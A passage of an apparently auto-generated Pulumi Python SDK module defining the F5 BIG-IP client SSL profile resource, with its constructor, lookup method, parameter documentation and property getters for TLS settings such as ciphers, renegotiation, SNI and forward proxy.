ciphers="DEFAULT",
defaults_from="/Common/clientssl",
name="/Common/test-ClientSsl")
```
:param str resource_name: The name of the resource.
:param ProfileClientSslArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ProfileClientSslArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
alert_timeout: Optional[pulumi.Input[str]] = None,
allow_non_ssl: Optional[pulumi.Input[str]] = None,
authenticate: Optional[pulumi.Input[str]] = None,
authenticate_depth: Optional[pulumi.Input[int]] = None,
c3d_client_fallback_cert: Optional[pulumi.Input[str]] = None,
c3d_drop_unknown_ocsp_status: Optional[pulumi.Input[str]] = None,
c3d_ocsp: Optional[pulumi.Input[str]] = None,
ca_file: Optional[pulumi.Input[str]] = None,
cache_size: Optional[pulumi.Input[int]] = None,
cache_timeout: Optional[pulumi.Input[int]] = None,
cert: Optional[pulumi.Input[str]] = None,
cert_extension_includes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cert_key_chains: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ProfileClientSslCertKeyChainArgs']]]]] = None,
cert_life_span: Optional[pulumi.Input[int]] = None,
cert_lookup_by_ipaddr_port: Optional[pulumi.Input[str]] = None,
chain: Optional[pulumi.Input[str]] = None,
ciphers: Optional[pulumi.Input[str]] = None,
client_cert_ca: Optional[pulumi.Input[str]] = None,
crl_file: Optional[pulumi.Input[str]] = None,
defaults_from: Optional[pulumi.Input[str]] = None,
forward_proxy_bypass_default_action: Optional[pulumi.Input[str]] = None,
full_path: Optional[pulumi.Input[str]] = None,
generation: Optional[pulumi.Input[int]] = None,
generic_alert: Optional[pulumi.Input[str]] = None,
handshake_timeout: Optional[pulumi.Input[str]] = None,
inherit_cert_keychain: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
mod_ssl_methods: Optional[pulumi.Input[str]] = None,
mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
partition: Optional[pulumi.Input[str]] = None,
passphrase: Optional[pulumi.Input[str]] = None,
peer_cert_mode: Optional[pulumi.Input[str]] = None,
proxy_ca_cert: Optional[pulumi.Input[str]] = None,
proxy_ca_key: Optional[pulumi.Input[str]] = None,
proxy_ca_passphrase: Optional[pulumi.Input[str]] = None,
proxy_ssl: Optional[pulumi.Input[str]] = None,
proxy_ssl_passthrough: Optional[pulumi.Input[str]] = None,
renegotiate_period: Optional[pulumi.Input[str]] = None,
renegotiate_size: Optional[pulumi.Input[str]] = None,
renegotiation: Optional[pulumi.Input[str]] = None,
retain_certificate: Optional[pulumi.Input[str]] = None,
secure_renegotiation: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
session_mirroring: Optional[pulumi.Input[str]] = None,
session_ticket: Optional[pulumi.Input[str]] = None,
sni_default: Optional[pulumi.Input[str]] = None,
sni_require: Optional[pulumi.Input[str]] = None,
ssl_c3d: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy_bypass: Optional[pulumi.Input[str]] = None,
ssl_sign_hash: Optional[pulumi.Input[str]] = None,
strict_resume: Optional[pulumi.Input[str]] = None,
tm_options: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
unclean_shutdown: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ProfileClientSslArgs.__new__(ProfileClientSslArgs)
__props__.__dict__["alert_timeout"] = alert_timeout
__props__.__dict__["allow_non_ssl"] = allow_non_ssl
__props__.__dict__["authenticate"] = authenticate
__props__.__dict__["authenticate_depth"] = authenticate_depth
__props__.__dict__["c3d_client_fallback_cert"] = c3d_client_fallback_cert
__props__.__dict__["c3d_drop_unknown_ocsp_status"] = c3d_drop_unknown_ocsp_status
__props__.__dict__["c3d_ocsp"] = c3d_ocsp
__props__.__dict__["ca_file"] = ca_file
__props__.__dict__["cache_size"] = cache_size
__props__.__dict__["cache_timeout"] = cache_timeout
__props__.__dict__["cert"] = cert
__props__.__dict__["cert_extension_includes"] = cert_extension_includes
__props__.__dict__["cert_key_chains"] = cert_key_chains
__props__.__dict__["cert_life_span"] = cert_life_span
__props__.__dict__["cert_lookup_by_ipaddr_port"] = cert_lookup_by_ipaddr_port
__props__.__dict__["chain"] = chain
__props__.__dict__["ciphers"] = ciphers
__props__.__dict__["client_cert_ca"] = client_cert_ca
__props__.__dict__["crl_file"] = crl_file
__props__.__dict__["defaults_from"] = defaults_from
__props__.__dict__["forward_proxy_bypass_default_action"] = forward_proxy_bypass_default_action
__props__.__dict__["full_path"] = full_path
__props__.__dict__["generation"] = generation
__props__.__dict__["generic_alert"] = generic_alert
__props__.__dict__["handshake_timeout"] = handshake_timeout
__props__.__dict__["inherit_cert_keychain"] = inherit_cert_keychain
__props__.__dict__["key"] = key
__props__.__dict__["mod_ssl_methods"] = mod_ssl_methods
__props__.__dict__["mode"] = mode
if name is None and not opts.urn:
raise TypeError("Missing required property 'name'")
__props__.__dict__["name"] = name
__props__.__dict__["partition"] = partition
__props__.__dict__["passphrase"] = passphrase
__props__.__dict__["peer_cert_mode"] = peer_cert_mode
__props__.__dict__["proxy_ca_cert"] = proxy_ca_cert
__props__.__dict__["proxy_ca_key"] = proxy_ca_key
__props__.__dict__["proxy_ca_passphrase"] = proxy_ca_passphrase
__props__.__dict__["proxy_ssl"] = proxy_ssl
__props__.__dict__["proxy_ssl_passthrough"] = proxy_ssl_passthrough
__props__.__dict__["renegotiate_period"] = renegotiate_period
__props__.__dict__["renegotiate_size"] = renegotiate_size
__props__.__dict__["renegotiation"] = renegotiation
__props__.__dict__["retain_certificate"] = retain_certificate
__props__.__dict__["secure_renegotiation"] = secure_renegotiation
__props__.__dict__["server_name"] = server_name
__props__.__dict__["session_mirroring"] = session_mirroring
__props__.__dict__["session_ticket"] = session_ticket
__props__.__dict__["sni_default"] = sni_default
__props__.__dict__["sni_require"] = sni_require
__props__.__dict__["ssl_c3d"] = ssl_c3d
__props__.__dict__["ssl_forward_proxy"] = ssl_forward_proxy
__props__.__dict__["ssl_forward_proxy_bypass"] = ssl_forward_proxy_bypass
__props__.__dict__["ssl_sign_hash"] = ssl_sign_hash
__props__.__dict__["strict_resume"] = strict_resume
__props__.__dict__["tm_options"] = tm_options
__props__.__dict__["unclean_shutdown"] = unclean_shutdown
super(ProfileClientSsl, __self__).__init__(
'f5bigip:ltm/profileClientSsl:ProfileClientSsl',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
alert_timeout: Optional[pulumi.Input[str]] = None,
allow_non_ssl: Optional[pulumi.Input[str]] = None,
authenticate: Optional[pulumi.Input[str]] = None,
authenticate_depth: Optional[pulumi.Input[int]] = None,
c3d_client_fallback_cert: Optional[pulumi.Input[str]] = None,
c3d_drop_unknown_ocsp_status: Optional[pulumi.Input[str]] = None,
c3d_ocsp: Optional[pulumi.Input[str]] = None,
ca_file: Optional[pulumi.Input[str]] = None,
cache_size: Optional[pulumi.Input[int]] = None,
cache_timeout: Optional[pulumi.Input[int]] = None,
cert: Optional[pulumi.Input[str]] = None,
cert_extension_includes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
cert_key_chains: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ProfileClientSslCertKeyChainArgs']]]]] = None,
cert_life_span: Optional[pulumi.Input[int]] = None,
cert_lookup_by_ipaddr_port: Optional[pulumi.Input[str]] = None,
chain: Optional[pulumi.Input[str]] = None,
ciphers: Optional[pulumi.Input[str]] = None,
client_cert_ca: Optional[pulumi.Input[str]] = None,
crl_file: Optional[pulumi.Input[str]] = None,
defaults_from: Optional[pulumi.Input[str]] = None,
forward_proxy_bypass_default_action: Optional[pulumi.Input[str]] = None,
full_path: Optional[pulumi.Input[str]] = None,
generation: Optional[pulumi.Input[int]] = None,
generic_alert: Optional[pulumi.Input[str]] = None,
handshake_timeout: Optional[pulumi.Input[str]] = None,
inherit_cert_keychain: Optional[pulumi.Input[str]] = None,
key: Optional[pulumi.Input[str]] = None,
mod_ssl_methods: Optional[pulumi.Input[str]] = None,
mode: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
partition: Optional[pulumi.Input[str]] = None,
passphrase: Optional[pulumi.Input[str]] = None,
peer_cert_mode: Optional[pulumi.Input[str]] = None,
proxy_ca_cert: Optional[pulumi.Input[str]] = None,
proxy_ca_key: Optional[pulumi.Input[str]] = None,
proxy_ca_passphrase: Optional[pulumi.Input[str]] = None,
proxy_ssl: Optional[pulumi.Input[str]] = None,
proxy_ssl_passthrough: Optional[pulumi.Input[str]] = None,
renegotiate_period: Optional[pulumi.Input[str]] = None,
renegotiate_size: Optional[pulumi.Input[str]] = None,
renegotiation: Optional[pulumi.Input[str]] = None,
retain_certificate: Optional[pulumi.Input[str]] = None,
secure_renegotiation: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
session_mirroring: Optional[pulumi.Input[str]] = None,
session_ticket: Optional[pulumi.Input[str]] = None,
sni_default: Optional[pulumi.Input[str]] = None,
sni_require: Optional[pulumi.Input[str]] = None,
ssl_c3d: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy: Optional[pulumi.Input[str]] = None,
ssl_forward_proxy_bypass: Optional[pulumi.Input[str]] = None,
ssl_sign_hash: Optional[pulumi.Input[str]] = None,
strict_resume: Optional[pulumi.Input[str]] = None,
tm_options: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
unclean_shutdown: Optional[pulumi.Input[str]] = None) -> 'ProfileClientSsl':
"""
Get an existing ProfileClientSsl resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
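## Example Usage
A minimal lookup sketch; the resource name and ID below are illustrative, not taken from a real deployment, and the call only works inside a Pulumi program.
```python
import pulumi
import pulumi_f5bigip as f5bigip

# Hypothetical: recover the state of an existing client SSL profile by its full-path ID
existing = f5bigip.ltm.ProfileClientSsl.get("imported-ClientSsl",
    id="/Common/test-ClientSsl")
```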
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] alert_timeout: Alert time out
:param pulumi.Input[str] allow_non_ssl: Enables or disables acceptance of non-SSL connections. When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[str] authenticate: Specifies the frequency of client authentication for an SSL session. When `once`, the system authenticates the client once per SSL session.
When `always`, the system authenticates the client once per SSL session and also upon reuse of that session.
:param pulumi.Input[int] authenticate_depth: Specifies the maximum number of certificates to be traversed in a client certificate chain
:param pulumi.Input[str] c3d_client_fallback_cert: Specifies the client certificate to use in SSL client certificate constrained delegation. This certificate will be used if client does not provide a cert during the SSL handshake. The default value is none.
:param pulumi.Input[str] c3d_drop_unknown_ocsp_status: Specifies the BIG-IP action when the OCSP responder returns an unknown status. The default value is `drop`, which causes the connection to be dropped. Conversely, you can specify `ignore`, which causes the connection to ignore the unknown status and continue.
:param pulumi.Input[str] c3d_ocsp: Specifies the SSL client certificate constrained delegation OCSP object that the BIG-IP SSL should use to connect to the OCSP responder and check the client certificate status.
:param pulumi.Input[str] ca_file: Client certificate file path. Default None.
:param pulumi.Input[int] cache_size: Cache size (sessions).
:param pulumi.Input[int] cache_timeout: Cache time out
:param pulumi.Input[str] cert: Specifies a cert name for use.
:param pulumi.Input[Sequence[pulumi.Input[str]]] cert_extension_includes: Cert extension includes for ssl forward proxy
:param pulumi.Input[int] cert_life_span: Life span of the certificate in days for ssl forward proxy
:param pulumi.Input[str] cert_lookup_by_ipaddr_port: Cert lookup by ip address and port enabled / disabled
:param pulumi.Input[str] chain: Contains a certificate chain that is relevant to the certificate and key mentioned earlier.This key is optional
:param pulumi.Input[str] ciphers: Specifies the list of ciphers that the system supports. When creating a new profile, the default cipher list is provided by the parent profile.
:param pulumi.Input[str] client_cert_ca: client certificate name
:param pulumi.Input[str] crl_file: Certificate revocation file name
:param pulumi.Input[str] defaults_from: Parent profile for this clientssl profile. Once this value has been set, it cannot be changed. Default value is `/Common/clientssl`. It should be the full path `/partition/profile_name`.
:param pulumi.Input[str] forward_proxy_bypass_default_action: Forward proxy bypass default action. (enabled / disabled)
:param pulumi.Input[str] full_path: full path of the profile
:param pulumi.Input[int] generation: generation
:param pulumi.Input[str] generic_alert: Generic alerts enabled / disabled.
:param pulumi.Input[str] handshake_timeout: Handshake time out (seconds)
:param pulumi.Input[str] inherit_cert_keychain: Inherit cert key chain
:param pulumi.Input[str] key: Contains a key name
:param pulumi.Input[str] mod_ssl_methods: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] mode: ModSSL Methods enabled / disabled. Default is disabled.
:param pulumi.Input[str] name: Specifies the name of the profile. The name should be the full path, which is the combination of the `partition + profile name`, for example `/Common/test-clientssl-profile`.
:param pulumi.Input[str] partition: name of partition
:param pulumi.Input[str] passphrase: Client Certificate Constrained Delegation CA passphrase
:param pulumi.Input[str] peer_cert_mode: Specifies the way the system handles client certificates. When `ignore`, the system ignores certificates from client systems. When `require`, the system requires a client to present a valid certificate. When `request`, the system requests a valid certificate from a client but always authenticates the client.
:param pulumi.Input[str] proxy_ca_cert: Proxy CA Cert
:param pulumi.Input[str] proxy_ca_key: Proxy CA Key
:param pulumi.Input[str] proxy_ca_passphrase: Proxy CA Passphrase
:param pulumi.Input[str] proxy_ssl: Proxy SSL enabled / disabled. Default is disabled.
:param pulumi.Input[str] proxy_ssl_passthrough: Proxy SSL passthrough enabled / disabled. Default is disabled.
:param pulumi.Input[str] renegotiate_period: Renegotiate Period (seconds)
:param pulumi.Input[str] renegotiate_size: Renegotiate Size
:param pulumi.Input[str] renegotiation: Enables or disables SSL renegotiation. When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[str] retain_certificate: When `true`, client certificate is retained in SSL session.
:param pulumi.Input[str] secure_renegotiation: Specifies the method of secure renegotiation for SSL connections. When creating a new profile, the setting is provided by the parent profile.
When set to `request`, the system requests secure renegotiation of SSL connections.
`require` is the default setting; when set, the system permits initial SSL handshakes from clients but terminates renegotiations from unpatched clients.
When set to `require-strict`, the system requires strict renegotiation of SSL connections. In this mode the system refuses connections to insecure servers, and terminates existing SSL connections to insecure servers.
:param pulumi.Input[str] server_name: Specifies the fully qualified DNS hostname of the server used in Server Name Indication communications. When creating a new profile, the setting is provided by the parent profile. The server name can also be a wildcard string containing the asterisk `*` character.
:param pulumi.Input[str] session_mirroring: Session Mirroring (enabled / disabled)
:param pulumi.Input[str] session_ticket: Session Ticket (enabled / disabled)
:param pulumi.Input[str] sni_default: Indicates that the system uses this profile as the default SSL profile when there is no match to the server name, or when the client provides no SNI extension support. When creating a new profile, the setting is provided by the parent profile.
There can be only one SSL profile with this setting enabled.
:param pulumi.Input[str] sni_require: Requires that the network peers also provide SNI support; this setting only takes effect when `sni_default` is set to `true`. When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[str] ssl_c3d: Enables or disables SSL client certificate constrained delegation. The default option is disabled. Conversely, you can specify enabled to use the SSL client certificate constrained delegation.
:param pulumi.Input[str] ssl_forward_proxy: Specifies whether SSL forward proxy feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_forward_proxy_bypass: Specifies whether SSL forward proxy bypass feature is enabled or not. The default value is disabled.
:param pulumi.Input[str] ssl_sign_hash: SSL sign hash (any, sha1, sha256, sha384)
:param pulumi.Input[str] strict_resume: Enables or disables the resumption of SSL sessions after an unclean shutdown. When creating a new profile, the setting is provided by the parent profile.
:param pulumi.Input[Sequence[pulumi.Input[str]]] tm_options: List of enabled options, selected from a set of industry-standard options for handling SSL processing. By default,
`Don't insert empty fragments` and `No TLSv1.3` are listed as enabled options. Usage: `tm_options = ["dont-insert-empty-fragments", "no-tlsv1.3"]`.
:param pulumi.Input[str] unclean_shutdown: Unclean Shutdown (enabled / disabled)
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ProfileClientSslState.__new__(_ProfileClientSslState)
__props__.__dict__["alert_timeout"] = alert_timeout
__props__.__dict__["allow_non_ssl"] = allow_non_ssl
__props__.__dict__["authenticate"] = authenticate
__props__.__dict__["authenticate_depth"] = authenticate_depth
__props__.__dict__["c3d_client_fallback_cert"] = c3d_client_fallback_cert
__props__.__dict__["c3d_drop_unknown_ocsp_status"] = c3d_drop_unknown_ocsp_status
__props__.__dict__["c3d_ocsp"] = c3d_ocsp
__props__.__dict__["ca_file"] = ca_file
__props__.__dict__["cache_size"] = cache_size
__props__.__dict__["cache_timeout"] = cache_timeout
__props__.__dict__["cert"] = cert
__props__.__dict__["cert_extension_includes"] = cert_extension_includes
__props__.__dict__["cert_key_chains"] = cert_key_chains
__props__.__dict__["cert_life_span"] = cert_life_span
__props__.__dict__["cert_lookup_by_ipaddr_port"] = cert_lookup_by_ipaddr_port
__props__.__dict__["chain"] = chain
__props__.__dict__["ciphers"] = ciphers
__props__.__dict__["client_cert_ca"] = client_cert_ca
__props__.__dict__["crl_file"] = crl_file
__props__.__dict__["defaults_from"] = defaults_from
__props__.__dict__["forward_proxy_bypass_default_action"] = forward_proxy_bypass_default_action
__props__.__dict__["full_path"] = full_path
__props__.__dict__["generation"] = generation
__props__.__dict__["generic_alert"] = generic_alert
__props__.__dict__["handshake_timeout"] = handshake_timeout
__props__.__dict__["inherit_cert_keychain"] = inherit_cert_keychain
__props__.__dict__["key"] = key
__props__.__dict__["mod_ssl_methods"] = mod_ssl_methods
__props__.__dict__["mode"] = mode
__props__.__dict__["name"] = name
__props__.__dict__["partition"] = partition
__props__.__dict__["passphrase"] = passphrase
__props__.__dict__["peer_cert_mode"] = peer_cert_mode
__props__.__dict__["proxy_ca_cert"] = proxy_ca_cert
__props__.__dict__["proxy_ca_key"] = proxy_ca_key
__props__.__dict__["proxy_ca_passphrase"] = proxy_ca_passphrase
__props__.__dict__["proxy_ssl"] = proxy_ssl
__props__.__dict__["proxy_ssl_passthrough"] = proxy_ssl_passthrough
__props__.__dict__["renegotiate_period"] = renegotiate_period
__props__.__dict__["renegotiate_size"] = renegotiate_size
__props__.__dict__["renegotiation"] = renegotiation
__props__.__dict__["retain_certificate"] = retain_certificate
__props__.__dict__["secure_renegotiation"] = secure_renegotiation
__props__.__dict__["server_name"] = server_name
__props__.__dict__["session_mirroring"] = session_mirroring
__props__.__dict__["session_ticket"] = session_ticket
__props__.__dict__["sni_default"] = sni_default
__props__.__dict__["sni_require"] = sni_require
__props__.__dict__["ssl_c3d"] = ssl_c3d
__props__.__dict__["ssl_forward_proxy"] = ssl_forward_proxy
__props__.__dict__["ssl_forward_proxy_bypass"] = ssl_forward_proxy_bypass
__props__.__dict__["ssl_sign_hash"] = ssl_sign_hash
__props__.__dict__["strict_resume"] = strict_resume
__props__.__dict__["tm_options"] = tm_options
__props__.__dict__["unclean_shutdown"] = unclean_shutdown
return ProfileClientSsl(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="alertTimeout")
def alert_timeout(self) -> pulumi.Output[str]:
"""
Alert time out
"""
return pulumi.get(self, "alert_timeout")
@property
@pulumi.getter(name="allowNonSsl")
def allow_non_ssl(self) -> pulumi.Output[str]:
"""
Enables or disables acceptance of non-SSL connections. When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "allow_non_ssl")
@property
@pulumi.getter
def authenticate(self) -> pulumi.Output[str]:
"""
Specifies the frequency of client authentication for an SSL session. When `once`, specifies that the system authenticates the client once for an SSL session.
When `always`, specifies that the system authenticates the client once for an SSL session and also upon reuse of that session.
"""
return pulumi.get(self, "authenticate")
@property
@pulumi.getter(name="authenticateDepth")
def authenticate_depth(self) -> pulumi.Output[int]:
"""
Specifies the maximum number of certificates to be traversed in a client certificate chain
"""
return pulumi.get(self, "authenticate_depth")
@property
@pulumi.getter(name="c3dClientFallbackCert")
def c3d_client_fallback_cert(self) -> pulumi.Output[str]:
"""
Specifies the client certificate to use in SSL client certificate constrained delegation. This certificate will be used if the client does not provide a cert during the SSL handshake. The default value is none.
"""
return pulumi.get(self, "c3d_client_fallback_cert")
@property
@pulumi.getter(name="c3dDropUnknownOcspStatus")
def c3d_drop_unknown_ocsp_status(self) -> pulumi.Output[str]:
"""
Specifies the BIG-IP action when the OCSP responder returns unknown status. The default value is `drop`, which causes the connection to be dropped. Conversely, you can specify `ignore`, which causes the connection to ignore the unknown status and continue.
"""
return pulumi.get(self, "c3d_drop_unknown_ocsp_status")
@property
@pulumi.getter(name="c3dOcsp")
def c3d_ocsp(self) -> pulumi.Output[str]:
"""
Specifies the SSL client certificate constrained delegation OCSP object that the BIG-IP SSL should use to connect to the OCSP responder and check the client certificate status.
"""
return pulumi.get(self, "c3d_ocsp")
@property
@pulumi.getter(name="caFile")
def ca_file(self) -> pulumi.Output[str]:
"""
Client certificate file path. Default None.
"""
return pulumi.get(self, "ca_file")
@property
@pulumi.getter(name="cacheSize")
def cache_size(self) -> pulumi.Output[int]:
"""
Cache size (sessions).
"""
return pulumi.get(self, "cache_size")
@property
@pulumi.getter(name="cacheTimeout")
def cache_timeout(self) -> pulumi.Output[int]:
"""
Cache timeout
"""
return pulumi.get(self, "cache_timeout")
@property
@pulumi.getter
def cert(self) -> pulumi.Output[str]:
"""
Specifies a cert name for use.
"""
return pulumi.get(self, "cert")
@property
@pulumi.getter(name="certExtensionIncludes")
def cert_extension_includes(self) -> pulumi.Output[Sequence[str]]:
"""
Cert extension includes for ssl forward proxy
"""
return pulumi.get(self, "cert_extension_includes")
@property
@pulumi.getter(name="certKeyChains")
def cert_key_chains(self) -> pulumi.Output[Sequence['outputs.ProfileClientSslCertKeyChain']]:
return pulumi.get(self, "cert_key_chains")
@property
@pulumi.getter(name="certLifeSpan")
def cert_life_span(self) -> pulumi.Output[int]:
"""
Life span of the certificate in days for ssl forward proxy
"""
return pulumi.get(self, "cert_life_span")
@property
@pulumi.getter(name="certLookupByIpaddrPort")
def cert_lookup_by_ipaddr_port(self) -> pulumi.Output[str]:
"""
Cert lookup by IP address and port (enabled / disabled)
"""
return pulumi.get(self, "cert_lookup_by_ipaddr_port")
@property
@pulumi.getter
def chain(self) -> pulumi.Output[str]:
"""
Contains a certificate chain that is relevant to the certificate and key mentioned earlier. This key is optional.
"""
return pulumi.get(self, "chain")
@property
@pulumi.getter
def ciphers(self) -> pulumi.Output[str]:
"""
Specifies the list of ciphers that the system supports. When creating a new profile, the default cipher list is provided by the parent profile.
"""
return pulumi.get(self, "ciphers")
@property
@pulumi.getter(name="clientCertCa")
def client_cert_ca(self) -> pulumi.Output[str]:
"""
client certificate name
"""
return pulumi.get(self, "client_cert_ca")
@property
@pulumi.getter(name="crlFile")
def crl_file(self) -> pulumi.Output[str]:
"""
Certificate revocation file name
"""
return pulumi.get(self, "crl_file")
@property
@pulumi.getter(name="defaultsFrom")
def defaults_from(self) -> pulumi.Output[Optional[str]]:
"""
Parent profile for this clientssl profile. Once this value has been set, it cannot be changed. Default value is `/Common/clientssl`. It should be the full path `/partition/profile_name`.
"""
return pulumi.get(self, "defaults_from")
@property
@pulumi.getter(name="forwardProxyBypassDefaultAction")
def forward_proxy_bypass_default_action(self) -> pulumi.Output[str]:
"""
Forward proxy bypass default action. (enabled / disabled)
"""
return pulumi.get(self, "forward_proxy_bypass_default_action")
@property
@pulumi.getter(name="fullPath")
def full_path(self) -> pulumi.Output[str]:
"""
full path of the profile
"""
return pulumi.get(self, "full_path")
@property
@pulumi.getter
def generation(self) -> pulumi.Output[int]:
"""
generation
"""
return pulumi.get(self, "generation")
@property
@pulumi.getter(name="genericAlert")
def generic_alert(self) -> pulumi.Output[str]:
"""
Generic alerts enabled / disabled.
"""
return pulumi.get(self, "generic_alert")
@property
@pulumi.getter(name="handshakeTimeout")
def handshake_timeout(self) -> pulumi.Output[str]:
"""
Handshake timeout (seconds)
"""
return pulumi.get(self, "handshake_timeout")
@property
@pulumi.getter(name="inheritCertKeychain")
def inherit_cert_keychain(self) -> pulumi.Output[str]:
"""
Inherit cert key chain
"""
return pulumi.get(self, "inherit_cert_keychain")
@property
@pulumi.getter
def key(self) -> pulumi.Output[str]:
"""
Contains a key name
"""
return pulumi.get(self, "key")
@property
@pulumi.getter(name="modSslMethods")
def mod_ssl_methods(self) -> pulumi.Output[str]:
"""
ModSSL Methods enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "mod_ssl_methods")
@property
@pulumi.getter
def mode(self) -> pulumi.Output[str]:
"""
Enables or disables the SSL profile (enabled / disabled).
"""
return pulumi.get(self, "mode")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the profile. The name should be the full path, which is the combination of the `partition + profile name`, for example `/Common/test-clientssl-profile`.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def partition(self) -> pulumi.Output[str]:
"""
name of partition
"""
return pulumi.get(self, "partition")
@property
@pulumi.getter
def passphrase(self) -> pulumi.Output[str]:
"""
Client Certificate Constrained Delegation CA passphrase
"""
return pulumi.get(self, "passphrase")
@property
@pulumi.getter(name="peerCertMode")
def peer_cert_mode(self) -> pulumi.Output[str]:
"""
Specifies the way the system handles client certificates. When `ignore`, the system ignores certificates from client systems. When `require`, the system requires a client to present a valid certificate. When `request`, the system requests a valid certificate from a client but always authenticates the client.
"""
return pulumi.get(self, "peer_cert_mode")
@property
@pulumi.getter(name="proxyCaCert")
def proxy_ca_cert(self) -> pulumi.Output[str]:
"""
Proxy CA Cert
"""
return pulumi.get(self, "proxy_ca_cert")
@property
@pulumi.getter(name="proxyCaKey")
def proxy_ca_key(self) -> pulumi.Output[str]:
"""
Proxy CA Key
"""
return pulumi.get(self, "proxy_ca_key")
@property
@pulumi.getter(name="proxyCaPassphrase")
def proxy_ca_passphrase(self) -> pulumi.Output[str]:
"""
Proxy CA Passphrase
"""
return pulumi.get(self, "proxy_ca_passphrase")
@property
@pulumi.getter(name="proxySsl")
def proxy_ssl(self) -> pulumi.Output[str]:
"""
Proxy SSL enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "proxy_ssl")
@property
@pulumi.getter(name="proxySslPassthrough")
def proxy_ssl_passthrough(self) -> pulumi.Output[str]:
"""
Proxy SSL passthrough enabled / disabled. Default is disabled.
"""
return pulumi.get(self, "proxy_ssl_passthrough")
@property
@pulumi.getter(name="renegotiatePeriod")
def renegotiate_period(self) -> pulumi.Output[str]:
"""
Renegotiate Period (seconds)
"""
return pulumi.get(self, "renegotiate_period")
@property
@pulumi.getter(name="renegotiateSize")
def renegotiate_size(self) -> pulumi.Output[str]:
"""
Renegotiate Size
"""
return pulumi.get(self, "renegotiate_size")
@property
@pulumi.getter
def renegotiation(self) -> pulumi.Output[str]:
"""
Enables or disables SSL renegotiation. When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "renegotiation")
@property
@pulumi.getter(name="retainCertificate")
def retain_certificate(self) -> pulumi.Output[str]:
"""
When `true`, client certificate is retained in SSL session.
"""
return pulumi.get(self, "retain_certificate")
@property
@pulumi.getter(name="secureRenegotiation")
def secure_renegotiation(self) -> pulumi.Output[str]:
"""
Specifies the method of secure renegotiations for SSL connections. When creating a new profile, the setting is provided by the parent profile.
When `request` is set, the system requests secure renegotiation of SSL connections.
`require` is the default setting; when set, the system permits initial SSL handshakes from clients but terminates renegotiations from unpatched clients.
With the `require-strict` setting, the system requires strict renegotiation of SSL connections. In this mode the system refuses connections to insecure servers and terminates existing SSL connections to insecure servers.
"""
return pulumi.get(self, "secure_renegotiation")
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Output[str]:
"""
Specifies the fully qualified DNS hostname of the server used in Server Name Indication communications. When creating a new profile, the setting is provided by the parent profile. The server name can also be a wildcard string containing the asterisk `*` character.
"""
return pulumi.get(self, "server_name")
@property
@pulumi.getter(name="sessionMirroring")
def session_mirroring(self) -> pulumi.Output[str]:
"""
Session Mirroring (enabled / disabled)
"""
return pulumi.get(self, "session_mirroring")
@property
@pulumi.getter(name="sessionTicket")
def session_ticket(self) -> pulumi.Output[str]:
"""
Session Ticket (enabled / disabled)
"""
return pulumi.get(self, "session_ticket")
@property
@pulumi.getter(name="sniDefault")
def sni_default(self) -> pulumi.Output[str]:
"""
Indicates that the system uses this profile as the default SSL profile when there is no match to the server name, or when the client provides no SNI extension support. When creating a new profile, the setting is provided by the parent profile.
There can be only one SSL profile with this setting enabled.
"""
return pulumi.get(self, "sni_default")
@property
@pulumi.getter(name="sniRequire")
def sni_require(self) -> pulumi.Output[str]:
"""
Requires that the network peers also provide SNI support. This setting only takes effect when `sni_default` is set to `true`. When creating a new profile, the setting is provided by the parent profile.
"""
return pulumi.get(self, "sni_require")
@property
@pulumi.getter(name="sslC3d")
def ssl_c3d(self) -> pulumi.Output[str]:
"""
Enables or disables SSL client certificate constrained delegation. The default option is disabled. Conversely, you can specify enabled to use the SSL client certificate constrained delegation.
"""
return pulumi.get(self, "ssl_c3d")
@property
@pulumi.getter(name="sslForwardProxy")
